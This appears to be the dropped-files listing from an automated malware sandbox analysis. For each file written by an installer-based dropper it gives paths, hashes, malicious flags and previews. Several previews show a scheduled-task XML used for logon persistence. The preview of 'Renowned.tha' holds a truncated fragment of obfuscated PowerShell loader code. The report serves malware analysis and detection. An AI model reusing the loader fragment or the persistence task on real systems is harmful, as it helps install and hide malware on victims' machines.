Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L......].................d...\|......k2............@..........................P............@.................................<...........0Q..............8............................................................................................text....b.......d.................. ..`.rdata..J............h..............@..@.data....U...........\|..............@....ndata...................................rsrc...0Q.......R..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dfrahds.b0e.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jl0odl3.qtr.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnv5jhn5.g34.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_coya0rul.pgg.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hg1gkcok.dhh.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2gnpmra.ik5.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llvl3ye2.u1e.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5dd4u5z.ex5.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5q0y333.jyp.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vf4r3vkl.4dz.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bfc.exe

Process:	C:\Windows\SysWOW64\compact.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	modified
Size (bytes):	1561888
Entropy (8bit):	7.2941254280913554
Encrypted:	false
SSDEEP:	24576:vh8J9/TrKYI+HM+Ss/aX7F61JCnhglAFjJCF5dz8moz8d:CJcY1HXSs/aXxSsnqmFjJCF5dQmozq
MD5:	9468614D3915F76CE938B93A123E9043
SHA1:	701E2498F724DEDD62DD8589A06DA6B95078C631
SHA-256:	F4DDAAA1F5E462F067E6B1BFA02C7288568D0954F458C598857CFB1796A0EA5B
SHA-512:	A225A590E625A33F9A2213EFC16C3436C9E4A8B782B5C9A7847EC733EC820B8A5F793E037889C7D08651A6DEAFE4EE99D7F1D0ADD8FC314B6BC930C2E10E099E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L......].................d...\|......k2............@..........................P............@.................................<...........0Q..............8............................................................................................text....b.......d.................. ..`.rdata..J............h..............@..@.data....U...........\|..............@....ndata...................................rsrc...0Q.......R..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC293.tmp

Process:	C:\Users\user\Desktop\P1 HWT623ATG.bat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1605
Entropy (8bit):	5.129976303605111
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuThv
MD5:	ACE39D5C3A91CDF2B3819AE90184538E
SHA1:	91F59F94AA6F30A84C29D66E65F77A4AB42A5804
SHA-256:	EFF5C7BE7DE4B14287728310508DA8C772ED1A43F52EB3476E032B4C88B4DFED
SHA-512:	34449C8EE0E7206828A12F0B57EB4D278C979E2BEEBCE6C8B3D3BFC10DB7A868EEEF91E9BE7FF07B422E1A8BF1EC1DBA5A5254022239F99EAC2B436BAF646B63
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmpDBA9.tmp

Process:	C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1605
Entropy (8bit):	5.129976303605111
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuThv
MD5:	ACE39D5C3A91CDF2B3819AE90184538E
SHA1:	91F59F94AA6F30A84C29D66E65F77A4AB42A5804
SHA-256:	EFF5C7BE7DE4B14287728310508DA8C772ED1A43F52EB3476E032B4C88B4DFED
SHA-512:	34449C8EE0E7206828A12F0B57EB4D278C979E2BEEBCE6C8B3D3BFC10DB7A868EEEF91E9BE7FF07B422E1A8BF1EC1DBA5A5254022239F99EAC2B436BAF646B63
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\erindres\keres\Renowned.tha

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	ASCII text, with very long lines (53114), with no line terminators
Category:	dropped
Size (bytes):	53114
Entropy (8bit):	5.358012853177325
Encrypted:	false
SSDEEP:	1536:7pG7fRT7JeHGrVjy2b640GjcGWRiUg5dhzJOXL:VGLRRV2z40oAg5dhzJ8
MD5:	36C7728EAA221D8C2CF1C2EB3A790D11
SHA1:	9F359168B2851B3B5313E48304F088EBA4F9E0F0
SHA-256:	8228893CA45E5FA8F0790596A5B127CC6FEC335CD268A70396555E58E288113C
SHA-512:	758C3659C272191875BAD640B2DEF3AE0AD4B34CAF142C85BD18EF0DB54DB6411129A4E20CFB6E2CE45BD439171EDADF705615811289D6A53B48A2768D1C4CC2
Malicious:	true
Preview:	$Rektoratssekretrerne=$Matche;<#Antieavesdropping Skrueboltene Sexuelle #><#cirrocumulous Duttede Panbabylonism #><#Interjection ahriman Nedrigere Trykstavelsen Ankomstrkkeflgen Kfereret #><#Indekserede Methylpentoses Mulktering #><#Cykelbanen brndstofafgifter Softwarehus #><#Bluselens Aphorise Rivnings Bambusfljters Inbreak #>$Hyli = "Noege;OgortFOffi,uudel.nPaulacS emmtVv.tyi .ettoTilsjnDuell H rliB Damai B,owd Plumd lde u SmaglCanispForbuhEksekiKrediastam Widow(Porp `$QuintNUnderoNo.lin lincaMid lmSomereUensanForfrdPoetimPiloteFortsnpochet Besk,Refor Pale`$DysgeO Sy,tv Triee Arabrjordnr Vr,iiSp tasJungllTraduiMedvinLibangPes eeLedtorcen,rsGang. Wor.e=Anop Ps ud0Falte) astl{Vanil. Hexa`$ FortE,ysklnSendedtungsoFo sisadgansPhl,xeRehyprBleareSemisr Stor=Utvun-Under3Roadw1Casha5 Su.j1 ruma9 ,onc+ Grew3Whea 1Finan5Gumt.2Elocu1 Cogn;Clo.t Regn S,amp Hirtc Croix`$RockwP EntaoSebunoHennarBliergMang aS,mic Strid=Bravu Ca.omNVelareDkmanw Efte-Al.ptOBesk.b BrnejMoo.seRavnecFrostt ordn Crum

C:\Users\user\AppData\Local\erindres\keres\Standardens156\triradiation.rou

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	889122
Entropy (8bit):	0.4253155271216335
Encrypted:	false
SSDEEP:	768:c+PH/sWemnAz18IwbVMcHgckNRr132VDfiIwlvV1t7/V1hAsomFAvnp/xRU2ntnY:7uAD
MD5:	4416EB9F8A17D831FDB72F06EC338339
SHA1:	76CD596541DF4E697D84322DB24042C070DCA44F
SHA-256:	0D918B66F6CDFCB8D263514ED5DBA95EF3430103B635F720F38E22AE39279801
SHA-512:	EC283F8318C6582615FF5F5DC02E69B48CF5BCACC9C4DE270298EEEBD6A0E1AD2A3EB3DEAE2E9228D1483C7CB00E75A595FC3EF02748922566D9C7FFCAF7EB74
Malicious:	false
Preview:	............................!...........r................................................................................................................p.........&........................................9...................................................................................................................................................................................................................................................................#.......b......E................................................................................................'.........................j.....e.................................................................................O...................................................................................................................................................................<...................I........................................................3....................................................................

C:\Users\user\AppData\Local\erindres\keres\Standardens156\underslaaningerne.ken

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	895974
Entropy (8bit):	0.42324832921530375
Encrypted:	false
SSDEEP:	768:URnwYVcGfPfBEwZh5L6rZKLYyZx80zjRA3eDc6qdgYxfXAZ7FsRnCwHgzbhZfiEN:UVqkHHN
MD5:	004BC0DC64AE874A5964B25FA994C3E3
SHA1:	0E1FA140A2FEA9DE748820207050D6336CCAE29D
SHA-256:	B63AA93FDC0104F7572DBA9E13F0691176B760324CE067C26E0209C188894E48
SHA-512:	6143544F62868E723BB4E27AF6128AEDB7C6D6F32B95F103D2FEB293100451AF7AFE9F755AFF15C9F2E159E5374A451B0CA93823F7BD22C746DDBD8B5765E320
Malicious:	false
Preview:	.................]..................................`.....................I................................................................)...............................................o................\|....................................................................H..................................................................................................................................t..........................................................................................................................................................................................................O.........6......................................................................................................j.................................e.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\erindres\keres\cencerro.spa

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	1144615
Entropy (8bit):	0.43048853065191106
Encrypted:	false
SSDEEP:	768:Lj6P82/1QuwdbY3DeMuwfo7WQOZ06IYHmR2yMCxXVe+V4LlBjlGh/c2CP3AAQ2vL:H0D4pP+wmocKt
MD5:	EE049F2260AFE430FB2373517B734A07
SHA1:	8B2F648A48BE98BE5D67C5ADF8E95749B88A9BA3
SHA-256:	D47E1EA7CD20224D43FE168CFB9E9F1ABF383057E8CA6666DC2D9592AA63F710
SHA-512:	2F8C1A61BBFEDD5F5D04A4195309BA38119BED4B2C6496D6BFDF635B3A827424DCF2A579488AB89A6623C4789D135E3DAB73F09CF4D7D521C138DDC56B5E2F85
Malicious:	false
Preview:	.Y........................................h..........................................................................................................................@..............................................................................................................................................................................................................................................[.....,.........................................................................d.................................................................................................(................................................................................................................................N..................................*..........................................................................................................................................J..................................................................................................................

C:\Users\user\AppData\Local\erindres\keres\compassionating.Fjo

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	299850
Entropy (8bit):	7.7696265113216025
Encrypted:	false
SSDEEP:	6144:rmfPZt+NjuzXZIcLLlLlCytbH7FtIHGYt8MILZ2gm1Zuzj/rtNn+rol6//T8:kPZgGZIcXlJP1H7FymYK/V00PH4oob8
MD5:	65B7CC32B0133528A099DDE1AF99969B
SHA1:	F66D7985C426797BC2B6CE935C35FBB421DC3DE5
SHA-256:	E908FDA7B81A27C4FDDEE305B856A9B906DFF6CAC8261BCE552C12D0080ACD5E
SHA-512:	DD9C76004B7CF71DFF49359D60CF13B94F2860C241461870CA92F7E9A0966804190E7EFD3B3AD14F975290F0B0172074C5A3ADB741679E78428C3ED1F764E04E
Malicious:	false
Preview:	...................BBB.......................33.....kk.................a...........P..........F....OOO....x....i........@..C.............>......22...RR.........................................A.V.II..Z..............*................~..............~~~~..@@@.SS..........................L..............[[..q.....ppp....3...........................{... .........))..+.........Q..............hhh.......i........kk..............................LL...5.##...........`................w..........vv...............`.................................4444..............._............fff...../...E.K..............III.....K.=.........ww...............222.X........xxxxx.}........^.....................7.....SS...............33..,,.J.uuu...................=....................Z..................&&.....6..........}...................jj....J..............................88..........s....L..```...gg..WW.......Z........)....`.ii......7.....................III.>.OOO......"""""""""........X.[[....,,.-............

C:\Users\user\AppData\Local\erindres\keres\compos.lay

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	735172
Entropy (8bit):	0.43103788423085826
Encrypted:	false
SSDEEP:	768:UCzyyfEvddg8Py9oYGo+pwM1yDVoGE23tc6Z3qTc1L9BNboKadKom6KFKWKjyJ+r:LjJcE8F06
MD5:	26DCB62D0412B5571DFEF979E3E176DF
SHA1:	03FB702A93799D7704005C3574189D7772924E43
SHA-256:	3612EBEEA7D68AC8946D29AC0118808205ABC9C3D85206B749BDCBC975B81F2A
SHA-512:	835868F00F9D09251EDE31AC95FCD8F7A8DBD64997F2CD84EBFDE73BEE492A9793AE32AE0AABA7CAE359AC87F4B9C4B21DABD0E5100DD7A072E178F8570A469E
Malicious:	false
Preview:	.............................................................................................................................................................................................................................................................................................................U........I......................................................................................................................................................................................j.................................................................................P...........................................................................................................................?....................................h.....................................................................................................................................................................................................................,...........s..................V..................

C:\Users\user\AppData\Local\erindres\keres\galago.sig

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	731689
Entropy (8bit):	0.4295700734144442
Encrypted:	false
SSDEEP:	768:GYsKLXEXkzZ0bKhindgzlsjyjQr3dT3IaSF48zS5jEIwdwwAC9mbAq3Nz64kYkqc:VSzGwT
MD5:	30CED07C34309222ED0CC7759C0BC3F9
SHA1:	1455113ECAE9C6B05D3124F8669E797C1014DE58
SHA-256:	ACA3BF6FCBD735875F1D335535602D29DD066154DD8F6A3CFFC5476763F9F1BB
SHA-512:	FDB89B8B3E12304734482F6E031FCF915D401AF0BA0B1018710D0C68043B7358294A85783C6D15BFEAB3574AE936B663CBA303715B88146DAF51EFF67A4D44AE
Malicious:	false
Preview:	................y......5....................................................................................................................................................................................k.....i.........................................^........................................................................................................................I..................................................................................................................................v................................................................................................................................~..........................................M...........................................................................................................................G.E.....................9......................................."...................................................z....................6..........................................n...................

C:\Users\user\AppData\Local\erindres\keres\hyperangelical.teg

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	430048
Entropy (8bit):	0.42468912059533187
Encrypted:	false
SSDEEP:	768:AU5kkFC6aAxEq7UOuO+TBdDM3zlTjhdNKPlLKYeFmQUvsNnfnHwg:osp
MD5:	21106F41BAC9632FBDA478B841971F72
SHA1:	432ACFFC0CA6FBEF290FC46128224C2E8AF34800
SHA-256:	E7F5DC6A16EC4CAD583DD9732CAA877EE74A3BE11BAB6136A11A943651056697
SHA-512:	B068F63ED511F91B498B2FBB82360AC9AB0E429E33BA0F9AABF65700A1097B51C869D4A5DCA3D23AFB712413437AD2422CA7B5F2CC5D155BEA5E8BF561902987
Malicious:	false
Preview:	...................................................................................................Y....................6.................................................................................................,.................................................................................................................................................................a.....................................................................4....e............................................................................................................e.............2................Q..............................................I..........................................................................................'.................................................p...........................................................................................................M............................................................................................................

C:\Users\user\AppData\Local\erindres\keres\palation.det

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	1351130
Entropy (8bit):	0.4273181755378108
Encrypted:	false
SSDEEP:	768:i1wNakhT6LrOQqENJ4Ap1rkxElyuEr52P7+Bil0pJcGqNluyRYSP+IcGGL01dmIn:uFGquEOT+fIK
MD5:	D6FA9797819E133EA616B14120471732
SHA1:	4541BD151FA2AB2D730F752DFEE913F330A5B827
SHA-256:	A4C26EE0F397EEFEA06159F331D0A446228D4E913BBB0A24B2A0E253AC590FB0
SHA-512:	147909BBD52593A8DE109C9CCDE4C613B8C063BD3D825019BA47EEE9DDA5C33FC895E8246A26138F4D51AF8622D3A585374D8312809DE64702FE95962A9ED713
Malicious:	false
Preview:	.....D.....................2.............................................................................................................................w............B..........f...........................................................................................2..................................................................................................t..............................................................Q..........................................................................................................................................................................d..................................................................................................]..........................................2..............................................................................................!.......................................................................................c........................................................................

C:\Users\user\AppData\Local\erindres\keres\prepaying.rea

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	445165
Entropy (8bit):	0.429411438660737
Encrypted:	false
SSDEEP:	768:wksDqj1nIBOL3GidAxS42ek06p2vFRB8uFnklu2cvwjL0qmlEdz82Kz0r4:A
MD5:	A1B2D721EAF992907FDA8193D47895D3
SHA1:	BC50A831905A4A0C46085BD7E604ADF3BEDF2EC4
SHA-256:	286DC8715861649CC2BD3C016332E2F033677BC77EA5F9130B323A10F17D949E
SHA-512:	C3261520D492BA1511B739ACEB28808321266823CFB179AC9BD3FB581806C19C59510874DE47E17DE5E4DB58B3AC7D730F46F8811AE96C60720080D55762F8E5
Malicious:	false
Preview:	...................................................................................c........................s........................................................................................................................................................................................................................................2......2.............................................................................................=..................................................................................................&..........W....................................................5.....................................................................................................T...............................GO...............................................................................................................................................\...................................................................................................................

C:\Users\user\AppData\Local\erindres\keres\remitteredes.ras

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	981506
Entropy (8bit):	0.4300604146048382
Encrypted:	false
SSDEEP:	768:HlfEOFcRfcPHVey15VPOx+aLkAQ4W6ocIsDbQSGT+9wjM08ucHaZcpQkvgWX6sb/:L7VSGX93b
MD5:	B75BA8C6F851334EB0F126B0A75B45B8
SHA1:	B6BB2EACFA11EE53ED165B6262FE969547D56633
SHA-256:	E5EE2AD47575236F5B1224A40C2217BD8E5833319F52FB69E501C6273FD0514A
SHA-512:	E60C00064AAD8EB00F4F292C4BD68B5A2966AC3CA64605DA86BF2B6ADC8BDEEC2E002954C0059B0AF34C1E42B1856E562AF5C9698C641DFC9A2738494559C3B1
Malicious:	false
Preview:	.............................................................................................................................................................................................................................................................................................................................^...................................................................9...........#..\...................................................................J........................A.....................................................................................................................................................................................................................................................................y......................................................................................................................................................................................................................................R.............

C:\Users\user\AppData\Local\erindres\keres\skandinaviske.txt

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	426
Entropy (8bit):	4.259938392558718
Encrypted:	false
SSDEEP:	12:XNBmqH3BXdER7fX+JOC5qlMMBpMjNCK1v/:X7pX/OCASS2N3H
MD5:	AFFD5D71BE1104555CD3D013603921DE
SHA1:	3091A46CBF02C1E8658F49CF1811ED0ADFFEFD61
SHA-256:	CA05B2DDE63E88AB6AF6E5D7A589F12408CE2C1601FF01DA03D755800B894D10
SHA-512:	8280A109E7C6E82E4372D67F9FE26DCACDD87909EF28DBE83022FF3D777D6B17E441E9B4BCC01216D6DF47B1FC97764C46AAB448626D09476B030FFFA502BC40
Malicious:	false
Preview:	regnet ordfattige empocket mondego suborned demonographies,quantificationally illucidation sparkplugged semanticists geksporterne stenotaphrum betingelsesskemas underbemandingerne triactinal..kartonernes churchmen baggaard obstinately,organogold nasicornous statusoptllingerne blokfunktionens subcriminally ophiurida.meridionality fuldstndiggrendes unindebted slimskken.withholden introgressant sammenflettes tekstinformation.

C:\Users\user\AppData\Local\erindres\keres\skarnsungen.ani

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	1118356
Entropy (8bit):	0.4308329030326928
Encrypted:	false
SSDEEP:	768:maKaLKvJO3H6g86kX0ZBoQF4wVBPpOLjCVC0EuoOgnyoDqMjWzzA+ZIYfnY/yVMy:7NIyP0tFPuh
MD5:	27ECF0DB055894CCA29A515CB24405C1
SHA1:	6785E0F14D2082E2ADDBE2E74C9E61D115F95D98
SHA-256:	84AD82B571E7E278AE0823897EBBFC28E7ADC66C27DCCA5D528F57467EBF96D8
SHA-512:	601F3C63B5C092F6003984CBC36B834B0898AD0DCAA427DD336FD265FD704F9063C66BC7DF934A4301985D77A4075B4E7D8C604C7CC96EC6A1E912B15DFFDAAA
Malicious:	false
Preview:	.................................A..............................................~..............................w...................................................................+............................................\...............................................................................................................................................................................................................................................c.....................a...........................................................................................]....................................................................................................................................r..............................................................................................S...........................................................................'....................................................................................!................................

C:\Users\user\AppData\Local\erindres\keres\skuboppernes.sys

Process:	C:\Users\user\AppData\Local\Temp\bfc.exe
File Type:	data
Category:	dropped
Size (bytes):	1410203
Entropy (8bit):	0.43255828772564464
Encrypted:	false
SSDEEP:	768:hB8uTcfnpP9qy1V7RS+sEaIatQu1WNMfyn4Rti8uOe/cFurkU1yuGbfId9C5zTER:zBjFm4V61jZGS
MD5:	9FB5A08E0D6D8318329F87990E347E52
SHA1:	0FDFF9C55954DFCF2E12F88CE040A937416F4970
SHA-256:	4028A1325D2D88343E072FFB7B2A9628DCAF75700263A32ADC99223F733C4E25
SHA-512:	D65C02A51153B1D7A3CF92EAC1160715C6F75D30836FF4AE33842693BFE83AC9BBBC3B3FF02498519CF0A31CE4278EE44E6F3B43C73B710445565B3F9B22319B
Malicious:	true
Preview:	...........................................................#......................................................................................................................................................................V......e.......\|..........................\|..................._......................................................................................................................\................................................................}........................................................................................x.................8.......................................................................................................................:.........................................................................................................................................................................................................................................................1.....................................5............

